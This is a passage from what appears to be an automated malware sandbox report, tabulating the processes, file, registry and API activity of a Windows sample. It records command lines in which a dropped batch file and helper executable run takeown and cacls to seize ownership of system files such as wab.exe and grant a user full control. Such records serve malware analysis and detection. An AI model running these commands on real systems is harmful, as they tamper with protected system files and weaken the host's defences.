| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-22 14:10:10 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 20030123574 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #29: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:16, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x138c |
| Parent PID | 0x1304 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1390
0x
1394
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #30: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:16, Reason: Child Process |
| Unmonitor | End Time: 00:02:16, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13a0 |
| Parent PID | 0x1304 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13A4
0x
13A8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #31: cmd.exe
367
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Mail\wab.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:17, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13cc |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13D0
0x
13F0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (285)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
139 | |
| Open | STD_INPUT_HANDLE | - |
|
15 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x4c8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0xed0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0xef4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "wab.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "wab.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #33: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:17, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13f4 |
| Parent PID | 0x1304 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13F8
0x
13FC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0xd04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #34: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\wab.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:17, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4c8 |
| Parent PID | 0x13cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EC8
0x
490
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #35: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:18, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd04 |
| Parent PID | 0x13f4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F94
0x
F90
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
